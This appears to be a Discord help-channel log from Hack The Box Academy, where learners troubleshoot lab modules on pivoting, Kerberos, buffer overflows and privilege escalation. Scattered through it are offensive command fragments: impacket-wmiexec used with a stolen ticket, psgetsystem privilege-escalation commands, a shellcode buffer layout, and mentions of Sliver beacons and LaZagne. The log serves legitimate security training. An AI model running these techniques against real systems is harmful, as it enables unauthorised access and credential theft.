We created a reverse tunnel using chisel so now we have a traffic coming to/from the MS01 host. We steal a Kerberos Ticket from LINUX01 (with another method we dont care for now), and when importing it to our attack host and use $ proxychains impacket-wmiexec dc01 -k this allows the impacket-wmiexec to spawn an interactive shell thanks to that ticket we previously imported that will serve as our pass when the wmiexec does its job on the target network? Thanks in advance and id appreciate any other useful resource or tip!

Is there going to be any module about OS/KERNEL EXPLOITATIONS and also PCI compliance techniques/methodoly etc?

kerberos tickets are an alternate authentication method within domains, so it's not as much of a password as it is a key or pass to access resources you request like how a ticket allows you to ride a train without trouble

PCI compliance: no
OS/Kernel Exploits: there's so many and such a wide range that depend on certain other factors; the privesc modules for windows and linux provide info on exlpoiting some commonly found ones (and some uncommon but good to check ones)

Hi, I know this isn't an academy question but any help would be appreciated. But why does this keep loading?

@nimble scroll that module is above t0, please don't post content from modules above t0.

Try CTRL+SHIFT+R to reload without using cache. If that doesn't work I'd suspect a network issue.

hello guys , i am in payload & shells host1 , i craft a payload and open multi handler and , navigate to the shell from the browser but i get 404 . can anyone help ?

Module: Pivoting, Tunneling, and Port Forwarding

Hello everyone! Can anyone help?

I’m trying to scan a host in the internal network through a pivot host using proxychains.

I use the command: proxychains nmap -vv -sV --top-ports=20 172.16.5.35

And I get the error: Segmentation fault (memory image flushed to disk)

When I use the command (without -sV): proxychains nmap -vv --top-ports=20 172.16.5.35

I don't get the error.

Of course, when I scan hosts in the local network, there is no issue with -sV. So it seems to be a problem with proxychains. But what’s the problem? The connection to the internal host is working fine; I can, for example, connect to the internal host via RDP through the pivot host.

I’m connecting via SOCKS5 proxy.

Has anyone encountered such an annoying problem?

If you're getting a 404 then the payload isn't there now is it? either that or wrong path

SOCKS proxies can only work in full packets.

-sV scanning use another type of packes?

that basic recommended module to use socks4, try changing the version on /etc/proxychains.conf

Reread the module, and it will explain.

@cloud urchin I advised the boy to use socks4 instead of version 5, because the module always shows version 4 in use, also I'm doing the module, and using version 4 I'm not having problems for now

but that's still a socks proxy

it was a suggestion, you could try

No, it has nothing to do with it.

Ping

Any one here from htb support team

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

@grim plaza the link above will help you contact support

Hey everyone whats up? I am using netexec for a question on password spraying for this question. --On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive). I have already created a file with the appropriate usernames. The problem i see on the command line after netexec finishes that many passwords are not even tried. I have done this question before like a year back or so so I know the answer but the tool just doesnt find it. I am using the fasttrack wordlist.

facing problem in this step

what problem

What's the command output?

And what does the module say before you run the command?

Can you link to the module please

https://academy.hackthebox.com/module/87/section/883

So the instructions before it just say how to update the system

tools.list is just a list of tools you can install them manually

look at the next step

try looking for the file on the system

locate tools.list might tell you where it is

The file doesnt exist by default gotta make it

That's what I was thinking

it says to make a list

bro. SNIP means it's omitted. Read the command and type the packages manually

I don't recommend copying and pasting commands

actually i am totally new

no problem.

Another reason why you should not copy and paste

Blackfire.io ❤️‍🔥

ok

or make a tools.list of the tools you want to install and follow the next step

ok

Are you new to linux?

yes

If so you might benefit from the linux fundamentals module

Parrot should have a package group for their security tools, instead of reading from a file you just grab a bunch of ones that would be in it

Right ways to learn hacking ?

I would look at the parrot repository for package groups

actually i am following the path so linux fundamental comes sfter the settting up module

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

for @rustic sage

I just told you in #cpts

Learn assembly and C first

In text @real delta

In all seriousness just follow the beginner's bible

In what text?

Just read the blog from the getting started bruh

Parrot comes has all the tools you need preinstalled if you chose the security edition I think

yes i checked,and saw some are available

You can skip most things in the setting up module if you're using parrotOS

wireshark is already installed and some other tools which are mentioned also installed

thanks for the help

ok sure

I am currently taking the OS fundamentals course and I'm at the linux part. I always have issues when I try to SSH into the target machine. Can someone tell me the procedures in case I am doing anything wrongly.

What issue are you having?

The password for the machine is being requested, I input it and get a message that I am denied

Am I putting in the wrong password or what ?

can you show me your command?

Also - are you connected to the vpn?

Give me a minute to do that.
How do I connect to the vpn ?

are you using the pwnbox or your own machine

pwnbox == in-browser vm

good question 🙂

if using pwnbox, then you don't need to connect

otherwise https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

Yes I’m using the pwnbox

Then you should be fine on the VPN part

ok so next question:
what does your command look like that you're trying to connect to the target?

Can I ask 1 simple question ❓

you just did, that's all your questions used up; please insert 1 fakecoin into your account to ask more

https://dontasktoask.com

Simple question is what is hacking (no cheating ) ?

That cheating

?

U should tell by own

dude

This isn't #general chat

you asked a googleable question

Read #welcome and follow instructions to get access to talk there

since we have a lot of people that are ESL (English Second Language) your question came off in a way that made the assumption you were asking what hacking was, but not cheating as in game cheating

I have ETL

and i have brain damage

we know

you weren't supposed to agree

I am new here

👉 #welcome 👈

which is why we pointed you to #welcome

and as a side note #rules <-

I read it

then you'd know what the server is about and how to verify and link your HTB account :)

#general is for various types of conversations, #modules is for conversation/help with the various learning modules found at https://academy.hackthebox.com

I have not HTB account now but I will made it soon

owerShell 7.5.0
Welcome to Parrot OS

Welcome to Pwnbox, Powered by Parrot OS
PS [10.10.14.192] /home/htb-ac-1793917 > ssh 10.129.116.172 [@htb-student]
The authenticity of host '10.129.116.172 (10.129.116.172)' can't be established.
ED25519 key fingerprint is SHA256:PHsjpBEAl6hSCzjVohppUybupbLXdBZy8FqtwlMpmjU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.116.172' (ED25519) to the list of known hosts.
htb-ac-1793917@10.129.116.172's password:
Permission denied, please try again.
htb-ac-1793917@10.129.116.172's password:
Permission denied, please try again.
htb-ac-1793917@10.129.116.172's password:

you should be doing this: ssh htb-student@10.129.116.172

right now the user you're trying to connect with is your htb pwnbox username

How to reply and talk in #general
An eroor was
Done reading ? Cheak out #modules

We just explained you buddy

Read and follow #welcome

Follow #welcome

Yup

Then you can talk in #general

But nothing happen

Okay

You did not follow the instructions then @rustic sage

it's three simple steps

You need to verify in #bot-commands and read #rules

What that was step ?

there's a list of instructions at the bottom of the #welcome page; the "done reading" thing is discord, not HTB telling you to go here

read #welcome again

since this would be technically the most active channel you can access

3 steps, can't miss

It worked, thank you for the assistance !

you're welcome 👏 enjoy!

the syntax is also given by the module itself

i believe just at the bottom of the reading portion

I made my HTB account now what to do

Read the next steps in #welcome

Where is account identifiyer

Step one tells you

How to cheak and copy it

There's a direct link

Yes but how to ding account identifiyer location

Ding = find

are you on your phone?

Yes

The link in the #welcome section points you right to the page where the identifier is

you just have to copy/paste it in the command /identify token-here

Try landscape mode or request desktop version 🙂 some phones can't parse the screen properly

Is that start with #

No

Number

I done it

Thanks u

🥳 now you can chat in #general

Are u bot

no

User

Why u help me ?

Let's talk in #general

I have some troble to find the correct size. Also the format give me questions.

´Modul: Stack-Based Buffer Overflows on Linux x86
Kaptittel: Determine the Length for Shellcode
Question: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)´

Did the Format: 00 Bytes mean Dez or Hex 00-99 00-FF
is: 00 00 00 00 also possible?

The next part is what is the Size now:

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4
the current shellcode is 68

but what is the largest possible?
1036?
936?
250?

hex

00 is hex

x00 is null bytes

hex thanks

with the x or without

ff or FF make also a difference

I need help. Please, how do I get multiple URLs from keywords?

For what academy module is this for?

It’s for a personal educational project.

then it's not for this channel, read and follow #welcome to gain access to more of the server

is it just me or is it nearly impossible to have findings with a "Low" (say, below 4.0) CVSS 3.1 score?

Take the "Directory listing enabled" finding example in the Documentation & Reporting module. This is a case where no sensitive data was found in said directories.

They got it to score 4.3 (and made it a "Low" too but technically 4.3 is "Medium") I guess by marking it as Adjacent attack vector, but if I can reach the relevant site from the Internet I think it should be Network, plus a Low confidentiality impact, making it a 5.3. The best I can do is change the Environmental factor for Confidentiality Requirement to also be Low, bringing it down to 4.6... still medium, and still sounding excessive, taking attention away from more important issues.

Hi folks, any academy modules can help me prepare OSEP? Please share some thoughts

Look at the OSEP syllabus and do the modules that look similar to it

Kerberos attacks for example

hi folks, lm doing the Linux Fundamentals module.
l got stuck on these 2 question under the filter content section

1. How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
2. Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer

Is anybody onlien

1. Think about the question and what that could mean i.e. what does localhost look like in ip format. If you don't know what tool, something about network statistics

For number 2. You can search the channel using ctrl+f or the magnifying glass icon

Nobody's online, this is all a figment of your imagination

You can DM me but might take a few hours until I can get back to you

hello guys, i have a doubt about subscriptions.

i currently have the annual silver plan ($500) every year

i plan to buy a module that costs 1000 cubes

my idea was to do the monthly subscription of $78, so as to receive 1000 cubes and buy the osint module. or do the monthly subscription of 38 and maybe buy some remaining cubes (i already have 200).

but i have some questions.

can i do a monthly subscription while i have an annual subscription?

if i could, when i pay the $78, will i receive the 1000 cubes immediately or will i have to wait 1 month?

instead in that case i could not pay the monthly subscription. can i cancel the annual subscription so i can then do the monthly one?, i still have about 6 months to enjoy the benefits of the annual one, so i don't want to lose the benefits if i cancel the subscription. so my question is, if i cancel the 1 year silver subscription, do i lose access to the modules up to tier || ? and can i then do the monthly one?

best to reach out to support to find the answer

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

one more thing, how can you access the general chat? Isn't it enough to have the $500 subscription?

ok

I'm fairly certain that you can't stack subscriptions.

Read and follow #welcome

i still hanging and dont found it i dont want brute force

Hi man, can i DM you ?

hello, i got a notification that you mentioned me

go ahead

Can anyone help with a beacon not calling back with Sliver? I can run the beacon direct as an .exe but can't execute it as shellcode for some reason

100 NOPs + 150 SHELLCODE = 250

The question is straight forward.
You just add NOPS and Shellcode together

but FA fa xfa xFA /xfa /xFA are all wrong and also 250

250 bytes you have to add that

https://tenor.com/view/really-bitch-annoyed-face-stare-whatever-kid-gif-17309831

around 1-2 hourers lost

How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4

NOPS is 100 bytes and shellcode is 150 so thats 250 Bytes

i think thy "Bytes" was more about 00

0x90 in hexadecimal represents the number 144 in decimal.

Additionally, in the context of assembly language (x86 architecture), 0x90 is the NOP (No Operation) instruction, often used in exploits and shellcode.

NOPs = "\x90" * 100 will print x90 hex 100 times

clearly. 250 was the first i try but i think the format: 00 Bytes means two hex digest. afterthat i try a lot other. now i know it was "250 Bytes"

no no. it ment in bytes not in hex format

now i know just a misunderstanding

happy hacking...

good morning. I have a question I'm in the module "Pivoting, Tunneling, and Port Forwarding " in Skills Assessment: I'm trying to connect RDP using proxychains to 172.16.5.35 but I get error failled to connect to 172.16.5.35

proxychains] Dynamic chain ... 127.0.0.1:9050 ... 172.16.5.35:3389 <--socket error or timeout!

Shutdown the VPN and use PWN box

Ok I will try!

are they working fixing the VPN

Because I don't see any announcements about it!

i am doing the module also, just for fun

is working in pwn box?

well i switched to vpn i used pwnbox

did you do the 1st question ?

yes, I'm doing right now this one : Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.

I was trying to connect to RDP to 172.16.5.35 but i get error connection proxychains xfreerdp, the think I don't finish this part last night I found all the port open now I come back this morning the port and trying to finish I found all port closed : 22/tcp closed ssh
135/tcp closed msrpc
445/tcp closed microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp closed wsman

refresh my memory, how did you connect to 172 network i got creds found from the /home directory

from you virtual machine or pwnbox?

What proxy have you setup?

5

Chisel? SSH ?

ssh

virtual machine

Looks like your proxychains isn't set correct

Try run Crackmap/Netexec with SMB over proxychains to check

ok will restart the VM better am start all over again !

yes I will

What SSH command are you running to port forward?

sudo ssh -i id_rsa webamin@ip:~/

You are missing the port forwarding

@calm abyss how do you suggested bypass the DRM in the Game Moding Skill assessment, i try to hook the checkStart() function and modifiy the num value

check the module does it add like SSH -R 3389:IP:3389?

or they run chisel or something?

forget that, use chat GPT to rewrite the complete code. Filter out the DRM garbage and give you the normal code

you have a Private message...

Anyone any idea on this? 😦

when i use echo ${LANG} it shows en_US.UTF-8
How come i cannot see the "-" anymore when i use this commmand:

 echo ${LANG:9:1}

i only see a blank space.. it worked yesterday..
i can see all the other characters, but not -

is there a command to make it appear again?

i go offline

I'm doing the attacking web apps with ffuf module on Kali with vpn but I'm getting like 70req/s which is taking forever with the small word list the module says to use, is there a way to make ffuf faster, I have it set to -t 100

Module mentions how it can get thousands a second

Hey guys, I’m new here trying to start hack the box challenges and I’m trying to pwn the machine titanic but finding it difficult, any help or guidance plsss

its been 3 days i give up on these

keep encountering this problem where LaZagne aint working for some reason

please dm me if you can help

Hello guys, i was reading through some modules for the SOC analyst job path(i am a newbie) and in the "Security Monitoring & SIEM Fundamentals" module on the skill assessment section i was unsure about the answer in one of the question. Is there somewhere like a forum that can help me understand why one of the answers i gave was not the correct one? what should i be on the lookout for in these kinds of situations? Thanks in advance

Which question was it?

it was this one. you see the correct answer here, but there was one admin user with much more failed log in attempts, my question was should i be looking at something different for this question since everything seemed good.

Hmmm I need to see the dashboard again for this one. The skill assessment really just wants you to focus on the one visualization it mentions in the question. I assume it was just a handful of unsuccessful logins and is meant to teach you that not every failed login is worth escalating

Windows Privilege Escalation - SeDebugPrivilege

Trying to do the task but I'm getting this error after imported and running the command in this poc: https://github.com/decoder-it/psgetsystem/tree/master

> . .\psgetsys.ps1


> ImpersonateFromParentPid -ppid 612 -command "cmd.exe"
Exception calling "CreateProcessFromParent" with "3" argument(s): "Not all privileges or groups referenced are assigned to
the caller"
At C:\Users\jordan\psgetsys.ps1:175 char:1
+ [MyProcess]::CreateProcessFromParent($ppid,$command,"$command $cmdarg ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception

Can someone give me a nudge with reverse engineering? I am in the stack based buffer overflows for x86 section

how can you Paste Screenshot here?

screen snip

uhh thanks

np

you mean sniptool?

Yo! Quick question. For Metasploit do I set LHOST to VPN IP or use my own?

Can anyone tell me the ip for the web server on the internal network using pwnbox. This is related to pivoting module and rpivot section

Because I used firefox with proxychains for 172.16.5.135, it's getting timeout error

As a shortcut I use

set lhost tun0

Oh that's a nice tip! thanks!

Is that the 64 bit?

Does anyone know re?

I am having trouble with stack overflow

I don't think running the program will give you the solution. To execute a 16-bit program, you'll need an emulator. Maybe someone who has done the lab can guide you, or you can look up how to emulate 16-bit programs. Alternatively, using a 32-bit machine should allow you to run them natively.

ive been searching for days man if you can just give me the answers

https://tenor.com/view/we-dont-do-that-here-black-panther-tchalla-bruce-gif-16558003

why tho

Hello all ! I started htb academy today. I am actually doing network foundations.
But for the question 2 of the skills assessment :
What is the name of the program listening on localhost:5901 of the Pwnbox
I have no idea where to look at... I work with the vpn, tried nmap but the answer it gave me doesn't work... Thanks for your help !! 🙂

it would be doing you a disservice.

Hey I’m trying to complete the network foundation module but when I do the calculation for the port and try to connect to net cat it tells me connection refused

Maybe this help you? I'm not sure if it is the correct answer but you can try to use netstat for example and grep port and see what is on in the machine.

Guide for netstat:

https://www.geeksforgeeks.org/netstat-command-linux/

are you doing this on windows?

I answered every question except that last one

Yeah

Yeah to me?

Yes

Hit the windows symbol key, then type snipping and use that for screenshots

you can just hit the copy button and paste it directly in here

What module is?

You can also WIN + SHIFT + S to take a screenshot, it auto copies it and you can paste it here

I don’t want to leak the up address

Ip *

^ but snipping allows you to just grab a piece of it - like this

So does WIN SHIFT S

O.o

Oh and I don’t have discord on windows I’m using it on my phone

holy shlit

i thought it was like prt scr xD

thats useful lol

can anyone help with stack overflows?

@waxen mesa By leaking the IP do you mean your IP? If you're doing it via pwnbox it usually shows internal IP, which you can freely do i guess

..or rather, answer a question about the assessment?

I’m on pawnbox

I just wanna know tho is this netcat method the only way to get the answer because what if it’s not a mistake that I get refused connection on my end

I don’t know if you guys did this module before

There’s has to be another way to bypass the request filtering

Without using netcat

Because I can’t get the calculation right which I tried multiple times

To be fair, i didn't do the modules, but I've done some other ones on the site. And usually when you're stuck like this, most of the time it's something simple (but not obvious). It might be good to re-read the whole section for that question again, and see if you've missed something, a crucial step or something like that

Yeah I don’t know man

I just tried again

Hi Guys, can anyone give me some hints on this windows priv esc skill assessment question "Find the password for the ldapadmin account somewhere on the system*

This is nuts 🥜 lmao 😂

And there’s not even any write up for a walkthrough I could find for this

Uhh.. what command are you running? Looks like it's trying to do a DNS lookup

If you're connecting to an IP, it should not be doing that

Net cat brother

I’m wondering if it’s a hack the box issue or is it really just me

Yeah I’m using and ip

Right, but the rest of the command

Knowing it's netcat doesn't help much

There must be a character in the target that's causing it to be treated as a hostname, not an IP

Oh, it's the inverse lookup

Nevermind then. The FTP module can sometimes require a reset to get it working, not sure why personally.

Oh wow 🤯

Hi @fathom pendant ,can you please give me some hints on this question

That’s the thing with this IT stuff sometimes you think it’s you whole time it’s it lmao 😂

I would have sat here for minutes trying to figure out why this not working thanks for your input now I know I can just move on

Was the ftp command used in the module and exercises you went through?

Can't really say much more on it, as it's a tier 2 module

Good luck 🙂

Tbh just ping,nc,nmap and other but no ftp from the looks of it